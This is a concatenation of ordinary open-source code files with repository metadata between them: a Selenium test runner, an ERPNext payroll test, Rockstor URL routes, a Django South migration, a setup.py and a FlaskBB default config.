browser, javascript_unit_tests.JavaScriptUnitTests,
"")
return tests
def GetChromePath():
value = None
if sys.platform == "win32" or sys.platform == "cygwin":
import _winreg
try:
key = _winreg.OpenKey(_winreg.HKEY_CLASSES_ROOT,
"Applications\\chrome.exe\\shell\\open\\command")
(value, type) = _winreg.QueryValueEx(key, None)
_winreg.CloseKey(key)
value = os.path.dirname(value)
except WindowsError:
value = None
if '*googlechrome' in FLAGS.browser:
raise Exception("Unable to determine location for Chrome -- " +
"is it installed?")
return value
def main(unused_argv):
# Boolean to record if all tests passed.
all_tests_passed = True
selenium_constants.REFERENCE_SCREENSHOT_PATH = os.path.join(
FLAGS.referencedir,
"reference",
"")
selenium_constants.PLATFORM_SPECIFIC_REFERENCE_SCREENSHOT_PATH = os.path.join(
FLAGS.referencedir,
selenium_constants.PLATFORM_SCREENSHOT_DIR,
"")
# Launch HTTP server.
http_server = LocalFileHTTPServer.StartServer(FLAGS.product_dir)
if not http_server:
print "Could not start a local http server with root." % FLAGS.product_dir
return 1
# Start Selenium Remote Control and Selenium Session Builder.
sel_server_jar = os.path.abspath(FLAGS.selenium_server)
sel_server = SeleniumRemoteControl.StartServer(
FLAGS.verbose, FLAGS.java, sel_server_jar,
FLAGS.servertimeout)
if not sel_server:
print "Could not start selenium server at %s." % sel_server_jar
return 1
session_builder = SeleniumSessionBuilder(
sel_server.selenium_port,
int(FLAGS.servertimeout) * 1000,
http_server.http_port,
FLAGS.browserpath)
all_tests_passed = True
# Test browsers.
for browser in FLAGS.browser:
if browser in set(selenium_constants.SELENIUM_BROWSER_SET):
test_list = GetTestsForBrowser(browser, FLAGS.testprefix,
FLAGS.testsuffixes)
result = TestBrowser(session_builder, browser, test_list, FLAGS.verbose)
if not result.wasSuccessful():
all_tests_passed = False
# Log non-succesful tests, for convenience.
print ""
print "Failures for %s:" % browser
print "[Selenium tests]"
for entry in test_list:
if type(entry) == tuple:
test = entry[0]
else:
test = entry
if test in result.results:
if result.results[test] != 'PASS':
print test.name
print ""
print "[Perceptual Diff tests]"
for entry in test_list:
if type(entry) == tuple:
pdiff_test = entry[1]
if pdiff_test in result.results:
if result.results[pdiff_test] != 'PASS':
print pdiff_test.name
# Log summary results.
print ""
print "Summary for %s:" % browser
print " %d tests run." % result.testsRun
print " %d errors." % len(result.errors)
print " %d failures.\n" % len(result.failures)
else:
print "ERROR: Browser %s is invalid." % browser
print "Run with --help to view list of supported browsers.\n"
all_tests_passed = False
# Shut down remote control
shutdown_session = selenium.selenium("localhost",
sel_server.selenium_port, "*firefox",
"http://%s:%d" % (socket.gethostname(), http_server.http_port))
shutdown_session.shut_down_selenium_server()
if all_tests_passed:
# All tests successful.
return 0
else:
# Return error code 1.
return 1
if __name__ == "__main__":
remaining_argv = FLAGS(sys.argv)
# Setup the environment for Firefox
os.environ["MOZ_CRASHREPORTER_DISABLE"] = "1"
os.environ["MOZ_PLUGIN_PATH"] = os.path.normpath(FLAGS.product_dir)
# Setup the path for chrome.
chrome_path = GetChromePath()
if chrome_path:
if os.environ.get("PATH"):
os.environ["PATH"] = os.pathsep.join([os.environ["PATH"], chrome_path])
else:
os.environ["PATH"] = chrome_path
# Setup the LD_LIBRARY_PATH on Linux.
if sys.platform[:5] == "linux":
if os.environ.get("LD_LIBRARY_PATH"):
os.environ["LD_LIBRARY_PATH"] = os.pathsep.join(
[os.environ["LD_LIBRARY_PATH"], os.path.normpath(FLAGS.product_dir)])
else:
os.environ["LD_LIBRARY_PATH"] = os.path.normpath(FLAGS.product_dir)
sys.exit(main(remaining_argv))
| bsd-3-clause | -7,822,211,958,449,909,000 | 31.805073 | 83 | 0.651174 | false |
manassolanki/erpnext | erpnext/hr/doctype/payroll_entry/test_payroll_entry.py | 1 | 7091 | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import unittest
import erpnext
import frappe
from dateutil.relativedelta import relativedelta
from erpnext.accounts.utils import get_fiscal_year, getdate, nowdate
from erpnext.hr.doctype.payroll_entry.payroll_entry import get_start_end_dates, get_end_date
class TestPayrollEntry(unittest.TestCase):
def test_payroll_entry(self): # pylint: disable=no-self-use
for data in frappe.get_all('Salary Component', fields = ["name"]):
if not frappe.db.get_value('Salary Component Account',
{'parent': data.name, 'company': erpnext.get_default_company()}, 'name'):
get_salary_component_account(data.name)
if not frappe.db.get_value("Salary Slip", {"start_date": "2016-11-01", "end_date": "2016-11-30"}):
make_payroll_entry()
def test_get_end_date(self):
self.assertEqual(get_end_date('2017-01-01', 'monthly'), {'end_date': '2017-01-31'})
self.assertEqual(get_end_date('2017-02-01', 'monthly'), {'end_date': '2017-02-28'})
self.assertEqual(get_end_date('2017-02-01', 'fortnightly'), {'end_date': '2017-02-14'})
self.assertEqual(get_end_date('2017-02-01', 'bimonthly'), {'end_date': ''})
self.assertEqual(get_end_date('2017-01-01', 'bimonthly'), {'end_date': ''})
self.assertEqual(get_end_date('2020-02-15', 'bimonthly'), {'end_date': ''})
self.assertEqual(get_end_date('2017-02-15', 'monthly'), {'end_date': '2017-03-14'})
self.assertEqual(get_end_date('2017-02-15', 'daily'), {'end_date': '2017-02-15'})
def test_loan(self):
from erpnext.hr.doctype.salary_structure.test_salary_structure import (make_employee,
make_salary_structure)
from erpnext.hr.doctype.loan.test_loan import create_loan
branch = "Test Employee Branch"
applicant = make_employee("[email protected]")
company = erpnext.get_default_company()
holiday_list = make_holiday("test holiday for loan")
if not frappe.db.exists('Salary Component', 'Basic Salary'):
frappe.get_doc({
'doctype': 'Salary Component',
'salary_component': 'Basic Salary',
'salary_component_abbr': 'BS',
'type': 'Earning',
'accounts': [{
'company': company,
'default_account': frappe.db.get_value('Account',
{'company': company, 'root_type': 'Expense', 'account_type': ''}, 'name')
}]
}).insert()
if not frappe.db.get_value('Salary Component Account',
{'parent': 'Basic Salary', 'company': company}):
salary_component = frappe.get_doc('Salary Component', 'Basic Salary')
salary_component.append('accounts', {
'company': company,
'default_account': "Salary - " + frappe.db.get_value('Company', company, 'abbr')
})
company_doc = frappe.get_doc('Company', company)
if not company_doc.default_payroll_payable_account:
company_doc.default_payroll_payable_account = frappe.db.get_value('Account',
{'company': company, 'root_type': 'Liability', 'account_type': ''}, 'name')
company_doc.save()
if not frappe.db.exists('Branch', branch):
frappe.get_doc({
'doctype': 'Branch',
'branch': branch
}).insert()
employee_doc = frappe.get_doc('Employee', applicant)
employee_doc.branch = branch
employee_doc.holiday_list = holiday_list
employee_doc.save()
loan = create_loan(applicant,
"Personal Loan", 280000, "Repay Over Number of Periods", 20)
loan.repay_from_salary = 1
loan.submit()
salary_strcture = "Test Salary Structure for Loan"
if not frappe.db.exists('Salary Structure', salary_strcture):
salary_strcture = make_salary_structure(salary_strcture, [{
'employee': applicant,
'from_date': '2017-01-01',
'base': 30000
}])
salary_strcture = frappe.get_doc('Salary Structure', salary_strcture)
salary_strcture.set('earnings', [{
'salary_component': 'Basic Salary',
'abbr': 'BS',
'amount_based_on_formula':1,
'formula': 'base*.5'
}])
salary_strcture.save()
dates = get_start_end_dates('Monthly', nowdate())
make_payroll_entry(start_date=dates.start_date,
end_date=dates.end_date, branch=branch)
name = frappe.db.get_value('Salary Slip',
{'posting_date': nowdate(), 'employee': applicant}, 'name')
salary_slip = frappe.get_doc('Salary Slip', name)
for row in salary_slip.loans:
if row.loan == loan.name:
interest_amount = (280000 * 8.4)/(12*100)
principal_amount = loan.monthly_repayment_amount - interest_amount
self.assertEqual(row.interest_amount, interest_amount)
self.assertEqual(row.principal_amount, principal_amount)
self.assertEqual(row.total_payment,
interest_amount + principal_amount)
if salary_slip.docstatus == 0:
frappe.delete_doc('Salary Slip', name)
loan.cancel()
frappe.delete_doc('Loan', loan.name)
def get_salary_component_account(sal_comp):
company = erpnext.get_default_company()
sal_comp = frappe.get_doc("Salary Component", sal_comp)
sc = sal_comp.append("accounts")
sc.company = company
sc.default_account = create_account(company)
def create_account(company):
salary_account = frappe.db.get_value("Account", "Salary - " + frappe.db.get_value('Company', company, 'abbr'))
if not salary_account:
frappe.get_doc({
"doctype": "Account",
"account_name": "Salary",
"parent_account": "Indirect Expenses - " + frappe.db.get_value('Company', company, 'abbr'),
"company": company
}).insert()
return salary_account
def make_payroll_entry(**args):
args = frappe._dict(args)
payroll_entry = frappe.new_doc("Payroll Entry")
payroll_entry.company = erpnext.get_default_company()
payroll_entry.start_date = args.start_date or "2016-11-01"
payroll_entry.end_date = args.end_date or "2016-11-30"
payroll_entry.payment_account = get_payment_account()
payroll_entry.posting_date = nowdate()
payroll_entry.payroll_frequency = "Monthly"
payroll_entry.branch = args.branch or None
payroll_entry.create_salary_slips()
payroll_entry.submit_salary_slips()
if payroll_entry.get_sal_slip_list(ss_status = 1):
payroll_entry.make_payment_entry()
return payroll_entry
def get_payment_account():
return frappe.get_value('Account',
{'account_type': 'Cash', 'company': erpnext.get_default_company(),'is_group':0}, "name")
def make_holiday(holiday_list_name):
if not frappe.db.exists('Holiday List', holiday_list_name):
current_fiscal_year = get_fiscal_year(nowdate(), as_dict=True)
dt = getdate(nowdate())
new_year = dt + relativedelta(month=1, day=1, year=dt.year)
republic_day = dt + relativedelta(month=1, day=26, year=dt.year)
test_holiday = dt + relativedelta(month=2, day=2, year=dt.year)
frappe.get_doc({
'doctype': 'Holiday List',
'from_date': current_fiscal_year.year_start_date,
'to_date': current_fiscal_year.year_end_date,
'holiday_list_name': holiday_list_name,
'holidays': [{
'holiday_date': new_year,
'description': 'New Year'
}, {
'holiday_date': republic_day,
'description': 'Republic Day'
}, {
'holiday_date': test_holiday,
'description': 'Test Holiday'
}]
}).insert()
return holiday_list_name
| gpl-3.0 | -6,668,528,203,621,711,000 | 36.125654 | 111 | 0.687491 | false |
priyaganti/rockstor-core | src/rockstor/storageadmin/urls/share.py | 1 | 2128 | """
Copyright (c) 2012-2013 RockStor, Inc. <http://rockstor.com>
This file is part of RockStor.
RockStor is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published
by the Free Software Foundation; either version 2 of the License,
or (at your option) any later version.
RockStor is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
from django.conf.urls import patterns, url
from storageadmin.views import (ShareListView, ShareDetailView, ShareACLView,
SnapshotView, ShareCommandView,)
from django.conf import settings
share_regex = settings.SHARE_REGEX
snap_regex = share_regex
snap_command = 'clone'
share_command = 'rollback|clone'
urlpatterns = patterns(
'',
url(r'^$', ShareListView.as_view(), name='share-view'),
url(r'^/(?P<sname>%s)$' % share_regex, ShareDetailView.as_view(),
name='share-view'),
url(r'^/(?P<sname>%s)/(?P<command>force)$'
% share_regex, ShareDetailView.as_view(),),
# Individual snapshots don't have detailed representation in the web-ui. So
    # there is no need for SnapshotDetailView.
url(r'^/(?P<sname>%s)/snapshots$' % share_regex,
SnapshotView.as_view(), name='snapshot-view'),
url(r'^/(?P<sname>%s)/snapshots/(?P<snap_name>%s)$' % (share_regex,
snap_regex),
SnapshotView.as_view(), name='snapshot-view'),
url(r'^/(?P<sname>%s)/snapshots/(?P<snap_name>%s)/(?P<command>%s)$' %
(share_regex, snap_regex, snap_command), SnapshotView.as_view()),
url(r'^/(?P<sname>%s)/acl$' % share_regex, ShareACLView.as_view(),
name='acl-view'),
url(r'^/(?P<sname>%s)/(?P<command>%s)$' % (share_regex, share_command),
ShareCommandView.as_view()),
)
| gpl-3.0 | -8,414,302,478,397,085,000 | 39.150943 | 79 | 0.659774 | false |
globocom/database-as-a-service | dbaas/maintenance/migrations/0015_auto__add_maintenanceparameters.py | 1 | 5853 | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'MaintenanceParameters'
db.create_table(u'maintenance_maintenanceparameters', (
(u'id', self.gf('django.db.models.fields.AutoField')
(primary_key=True)),
('created_at', self.gf('django.db.models.fields.DateTimeField')
(auto_now_add=True, blank=True)),
('updated_at', self.gf('django.db.models.fields.DateTimeField')
(auto_now=True, blank=True)),
('parameter_name', self.gf(
'django.db.models.fields.CharField')(max_length=100)),
('function_name', self.gf(
'django.db.models.fields.CharField')(max_length=100)),
('maintenance', self.gf('django.db.models.fields.related.ForeignKey')(
related_name=u'maintenance_params', to=orm['maintenance.Maintenance'])),
))
db.send_create_signal(u'maintenance', ['MaintenanceParameters'])
def backwards(self, orm):
# Deleting model 'MaintenanceParameters'
db.delete_table(u'maintenance_maintenanceparameters')
models = {
u'maintenance.hostmaintenance': {
'Meta': {'unique_together': "((u'host', u'maintenance'),)", 'object_name': 'HostMaintenance', 'index_together': "[[u'host', u'maintenance']]"},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'finished_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'host': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'host_maintenance'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['physical.Host']"}),
'hostname': ('django.db.models.fields.CharField', [], {'default': "u''", 'max_length': '255'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'main_log': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'maintenance': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'maintenance'", 'to': u"orm['maintenance.Maintenance']"}),
'rollback_log': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'started_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '4'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
u'maintenance.maintenance': {
'Meta': {'object_name': 'Maintenance'},
'affected_hosts': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'celery_task_id': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'finished_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'hostsid': ('django.db.models.fields.CommaSeparatedIntegerField', [], {'max_length': '10000'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'main_script': ('django.db.models.fields.TextField', [], {}),
'maximum_workers': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '1'}),
'rollback_script': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'scheduled_for': ('django.db.models.fields.DateTimeField', [], {'unique': 'True'}),
'started_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
u'maintenance.maintenanceparameters': {
'Meta': {'object_name': 'MaintenanceParameters'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'function_name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'maintenance': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'maintenance_params'", 'to': u"orm['maintenance.Maintenance']"}),
'parameter_name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
u'physical.host': {
'Meta': {'object_name': 'Host'},
'address': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'hostname': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'monitor_url': ('django.db.models.fields.URLField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
}
}
complete_apps = ['maintenance']
| bsd-3-clause | -3,582,005,703,774,428,700 | 68.678571 | 191 | 0.572185 | false |
ErinMorelli/em-media-handler | setup.py | 1 | 2691 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# EM MEDIA HANDLER
# Copyright (c) 2014-2021 Erin Morelli
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
"""Media handler module setup
"""
import os
from setuptools import setup
from mediahandler.util.config import make_config
# Set up extra scripts
_extra_scripts = []
if os.name == 'nt':
_extra_scripts.append('addmedia-deluge.bat')
# Set up mediahandler package
setup(
name='em-media-handler',
version='1.2',
author='Erin Morelli',
author_email='[email protected]',
url='http://www.erinmorelli.com/projects/em-media-handler/',
license='MIT',
platforms='Linux, OSX, Windows',
description='A comprehensive media handling automation script.',
long_description=open('README.md').read(),
test_suite='tests.testall.suite',
include_package_data=True,
packages=[
'mediahandler',
'mediahandler.types',
'mediahandler.util',
],
entry_points={
'console_scripts': [
'addmedia=mediahandler.handler:main',
'addmedia-deluge=mediahandler.handler:deluge'
]
},
scripts=_extra_scripts,
install_requires=[
'pyyaml',
'google-api-python-client',
'mutagen',
'oauth2client<=3.0.0',
'setuptools>=40.3.0',
'requests'
],
extras_require={
'music': [
'beets',
'pylast==2.3.0'
],
'deluge': [
'twisted',
'pyopenssl'
],
},
tests_require=[
'unittest2',
'responses',
'mock'
],
classifiers=[
'Topic :: Home Automation',
'Topic :: Multimedia',
'Topic :: Software Development :: Libraries :: Python Modules',
'License :: OSI Approved :: MIT License',
'Environment :: MacOS X',
'Environment :: Console',
'Programming Language :: Python',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Operating System :: MacOS',
'Operating System :: POSIX :: Linux',
],
)
# Generate default config file
make_config()
| mit | -3,059,469,731,831,596,000 | 26.181818 | 71 | 0.614641 | false |
PermutaTriangle/Permuta | permuta/perm_sets/permset.py | 1 | 7411 | import multiprocessing
from itertools import islice
from typing import ClassVar, Dict, Iterable, List, NamedTuple, Optional, Union
from ..patterns import MeshPatt, Perm
from ..permutils import is_finite, is_insertion_encodable, is_polynomial
from .basis import Basis, MeshBasis
class AvBase(NamedTuple):
"""A base class for Av to define instance variables without having to use
__init__ in Av.
"""
basis: Union[Basis, MeshBasis]
cache: List[Dict[Perm, Optional[List[int]]]]
class Av(AvBase):
"""A permutation class defined by its minimal basis."""
_FORBIDDEN_BASIS = Basis(Perm())
_VALUE_ERROR_MSG = "Basis should be non-empty without the empty perm!"
_BASIS_ONLY_MSG = "Only supported for Basis!"
_CLASS_CACHE: ClassVar[Dict[Union[Basis, MeshBasis], "Av"]] = {}
_CACHE_LOCK = multiprocessing.Lock()
def __new__(
cls,
basis: Union[
Basis,
MeshBasis,
Iterable[Perm],
Iterable[Union[Perm, MeshPatt]],
],
) -> "Av":
if not isinstance(basis, (Basis, MeshBasis)):
return Av.from_iterable(basis)
if len(basis) == 0 or basis == Av._FORBIDDEN_BASIS:
raise ValueError(Av._VALUE_ERROR_MSG)
instance = Av._CLASS_CACHE.get(basis)
if instance is None:
new_instance: "Av" = AvBase.__new__(cls, basis, [{Perm(): [0]}])
Av._CLASS_CACHE[basis] = new_instance
return new_instance
return instance
@classmethod
def clear_cache(cls) -> None:
"""Clear the instance cache."""
cls._CLASS_CACHE = {}
@classmethod
def from_string(cls, basis) -> "Av":
"""Create a permutation class from a string. Basis can be either zero or one
        based and separated by anything. MeshBasis is not supported.
"""
return cls(Basis.from_string(basis))
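    # Illustrative call (string format assumed from the docstring above:
    # one- or zero-based patterns separated by any non-digit characters):
    #   Av.from_string("132_4312")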
@classmethod
def from_iterable(
cls, basis: Union[Iterable[Perm], Iterable[Union[Perm, MeshPatt]]]
) -> "Av":
"""
Create a permutation class from a basis defined by an iterable of patterns.
"""
if MeshBasis.is_mesh_basis(basis):
return cls(MeshBasis(*basis))
return cls(Basis(*basis))
def is_finite(self) -> bool:
"""Check if the perm class is finite."""
if isinstance(self.basis, MeshBasis):
raise NotImplementedError(Av._BASIS_ONLY_MSG)
return is_finite(self.basis)
def is_polynomial(self) -> bool:
"""Check if the perm class has polynomial growth."""
if isinstance(self.basis, MeshBasis):
raise NotImplementedError(Av._BASIS_ONLY_MSG)
return is_polynomial(self.basis)
def is_insertion_encodable(self) -> bool:
"""Check if the perm class is insertion encodable."""
if isinstance(self.basis, MeshBasis):
raise NotImplementedError(Av._BASIS_ONLY_MSG)
return is_insertion_encodable(self.basis)
def first(self, count: int) -> Iterable[Perm]:
"""Generate the first `count` permutation in this permutation class given
that it has that many, if not all are generated.
"""
yield from islice(self._all(), count)
def of_length(self, length: int) -> Iterable[Perm]:
"""
Generate all perms of a given length that belong to this permutation class.
"""
return iter(self._get_level(length))
def up_to_length(self, length: int) -> Iterable[Perm]:
"""Generate all perms up to and including a given length that
belong to this permutation class.
"""
for n in range(length + 1):
yield from self.of_length(n)
def count(self, length: int) -> int:
"""Return the nubmber of permutations of a given length."""
return len(self._get_level(length))
def enumeration(self, length: int) -> List[int]:
"""Return the enumeration of this permutation class up and including a given
length."""
return [self.count(i) for i in range(length + 1)]
def __contains__(self, other: object):
if isinstance(other, Perm):
return other in self._get_level(len(other))
return False
def is_subclass(self, other: "Av"):
"""Check if a sublcass of another permutation class."""
return all(p1 not in self for p1 in other.basis)
def _ensure_level(self, level_number: int) -> None:
start = max(0, len(self.cache) - 2)
if isinstance(self.basis, Basis):
self._ensure_level_classical_pattern_basis(level_number)
else:
self._ensure_level_mesh_pattern_basis(level_number)
for i in range(start, level_number - 1):
self.cache[i] = {perm: None for perm in self.cache[i]}
def _ensure_level_classical_pattern_basis(self, level_number: int) -> None:
# We build new elements from existing ones
lengths = {len(b) for b in self.basis}
max_size = max(lengths)
for nplusone in range(len(self.cache), level_number + 1):
n = nplusone - 1
new_level: Dict[Perm, Optional[List[int]]] = dict()
last_level = self.cache[-1]
check_length = nplusone in lengths
smaller_elems = {b for b in self.basis if len(b) == nplusone}
def valid_insertions(perm):
# pylint: disable=cell-var-from-loop
res = None
for i in range(max(0, n - max_size), n):
val = perm[i]
subperm = perm.remove(i)
spots = self.cache[n - 1][subperm]
acceptable = [k for k in spots if k <= val]
acceptable.extend(k + 1 for k in spots if k >= val)
if res is None:
res = frozenset(acceptable)
res = res.intersection(acceptable)
if not res:
break
return res if res is not None else range(nplusone)
for perm, lis in last_level.items():
for value in valid_insertions(perm):
new_perm = perm.insert(index=nplusone, new_element=value)
if not check_length or new_perm not in smaller_elems:
new_level[new_perm] = []
assert lis is not None
lis.append(value)
self.cache.append(new_level)
def _ensure_level_mesh_pattern_basis(self, level_number: int) -> None:
self.cache.extend(
{p: None for p in Perm.of_length(i) if p.avoids(*self.basis)}
for i in range(len(self.cache), level_number + 1)
)
def _get_level(self, level_number: int) -> Dict[Perm, Optional[List[int]]]:
with Av._CACHE_LOCK:
self._ensure_level(level_number)
return self.cache[level_number]
def _all(self) -> Iterable[Perm]:
length = 0
while True:
gen = (p for p in self.of_length(length))
first: Optional[Perm] = next(gen, None)
if first is None:
break
yield first
yield from gen
length += 1
def __str__(self) -> str:
return f"Av({','.join(str(p) for p in self.basis)})"
def __repr__(self) -> str:
return f"Av({repr(self.basis)})"
| bsd-3-clause | 2,888,055,935,576,423,400 | 36.619289 | 84 | 0.575361 | false |
redhat-openstack/oslo.messaging | tests/test_opts.py | 1 | 1718 |
# Copyright 2014 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import pkg_resources
import testtools
try:
from oslo.messaging import opts
except ImportError:
opts = None
from tests import utils as test_utils
class OptsTestCase(test_utils.BaseTestCase):
@testtools.skipIf(opts is None, "Options not importable")
def setUp(self):
super(OptsTestCase, self).setUp()
def _test_list_opts(self, result):
self.assertEqual(3, len(result))
groups = [g for (g, l) in result]
self.assertIn(None, groups)
self.assertIn('matchmaker_ring', groups)
self.assertIn('matchmaker_redis', groups)
opt_names = [o.name for (g, l) in result for o in l]
self.assertIn('rpc_backend', opt_names)
def test_list_opts(self):
self._test_list_opts(opts.list_opts())
def test_entry_point(self):
result = None
for ep in pkg_resources.iter_entry_points('oslo.config.opts'):
if ep.name == "oslo.messaging":
list_fn = ep.load()
result = list_fn()
break
self.assertIsNotNone(result)
self._test_list_opts(result)
| apache-2.0 | -1,196,736,249,446,566,700 | 30.814815 | 78 | 0.652503 | false |
jensck/fluidity | fluidity/incubator/next_actions_view.py | 1 | 4059 | import gtk
import pango
class NextActionsView(gtk.VBox):
"""Simple class for display of Next Actions"""
def __init__(self):
super(NextActionsView, self).__init__()
self._liststore = gtk.ListStore(bool, str, int, str)
self._treeview = gtk.TreeView()
self._treeview.get_selection().set_mode(gtk.SELECTION_MULTIPLE)
self._treeview.set_model(self._liststore)
self._actions = []
# Although this module requires a gtk.ListStore with a fixed format
# (bool, str, int, str), the code for supplying that ListStore
# is in the NextActionsModel module.
# we're assuming that a checkbox in a list of tasks, along with the
# strikethrough text for completed actions, will be enough to let the
# user know what the column is, instead of trying to fit the longer label
done_renderer = gtk.CellRendererToggle()
done_renderer.set_property("activatable", True)
done_renderer.connect("toggled", self.on_done_toggled)
done_column = gtk.TreeViewColumn(None, done_renderer, active=0)
summary_cell = gtk.CellRendererText()
summary_column = gtk.TreeViewColumn(None, summary_cell, text=1)
summary_column.set_cell_data_func(summary_cell, _format_func, data=None)
context_cell = gtk.CellRendererText()
context_column = gtk.TreeViewColumn(None, context_cell, text=3)
context_column.props.sizing = gtk.TREE_VIEW_COLUMN_AUTOSIZE
for col in done_column, context_column, summary_column:
self._treeview.append_column(col)
self._treeview.props.headers_visible = False
self._treeview.props.rules_hint = True
self.pack_start(self._treeview, True, True, 0)
def get_selected_model_objects(self):
"""Return the selected *objects*, ala Kiwi's ObjectList."""
model, selected_rows = self._treeview.get_selection().get_selected_rows()
# have to do this goofy i[0] because .get_selected_rows() returns
# *tuples* (representing "paths" in GTK-speak) with the first member
# as the index of the row
return [self._actions[i[0]] for i in selected_rows]
def set_actions(self, actions):
self.clear()
self._actions.extend(actions)
for action in actions:
self._liststore.append(_convert_na_to_iterable(action))
def clear(self):
self._actions = [] # Gross. Why don't Python lists have a .clear()?
self._liststore.clear()
def on_done_toggled(self, cell_renderer, path, data = None):
action = self._actions[int(path[0])]
action.complete = not action.complete
# self._liststore.row_changed(path, self._liststore.get_iter(path))
# cell_renderer.set_active(action.complete)
self._liststore[path][0] = action.complete
def _convert_na_to_iterable(na):
item = list()
item.append(na.complete)
item.append(na.summary)
item.append(na.priority)
item.append(na.context)
return item
def _format_func(column, cell, model, my_iter):
"""Format gtk.TreeView cell according to priority and completion status
of a gee_tee_dee.NextAction.
"""
# Using this font makes the UltraHeavy, Normal, and UltraLight text
# weights clearly distinguishable from one another.
# cell.set_property("font", "Sans 12")
if (model.get_value(my_iter, 0) == True):
# First check completion status of task (column 0 of the model)
# and set "strikethrough" for display of completed tasks.
cell.set_property("strikethrough", True)
else:
cell.set_property("strikethrough", False)
if model.get_value(my_iter, 2) == 1:
# Now check priority of task and set text weight accordingly.
cell.set_property("weight", pango.WEIGHT_HEAVY)
elif model.get_value(my_iter, 2) == 3:
cell.set_property("weight", pango.WEIGHT_ULTRALIGHT)
else:
cell.set_property("weight", pango.WEIGHT_NORMAL)
| gpl-3.0 | -4,824,018,486,579,330,000 | 40.845361 | 81 | 0.647204 | false |
joyhuang-web/flaskbb | flaskbb/configs/default.py | 1 | 2497 | # -*- coding: utf-8 -*-
"""
flaskbb.configs.default
~~~~~~~~~~~~~~~~~~~~~~~
This is the default configuration for FlaskBB that every site should have.
You can override these configuration variables in another class.
:copyright: (c) 2014 by the FlaskBB Team.
:license: BSD, see LICENSE for more details.
"""
import os
class DefaultConfig(object):
# Get the app root path
# <_basedir>
# ../../ --> flaskbb/flaskbb/configs/base.py
_basedir = os.path.join(os.path.abspath(os.path.dirname(os.path.dirname(
os.path.dirname(__file__)))))
DEBUG = False
TESTING = False
# Logs
# If SEND_LOGS is set to True, the admins (see the mail configuration) will
# recieve the error logs per email.
SEND_LOGS = False
# The filename for the info and error logs. The logfiles are stored at
# flaskbb/logs
INFO_LOG = "info.log"
ERROR_LOG = "error.log"
# Default Database
SQLALCHEMY_DATABASE_URI = 'sqlite:///' + _basedir + '/' + \
'flaskbb.sqlite'
# This will print all SQL statements
SQLALCHEMY_ECHO = False
# Security
# This is the secret key that is used for session signing.
# You can generate a secure key with os.urandom(24)
SECRET_KEY = 'secret key'
# Protection against form post fraud
WTF_CSRF_ENABLED = True
WTF_CSRF_SECRET_KEY = "reallyhardtoguess"
# Searching
WHOOSH_BASE = os.path.join(_basedir, "whoosh_index")
# Auth
LOGIN_VIEW = "auth.login"
REAUTH_VIEW = "auth.reauth"
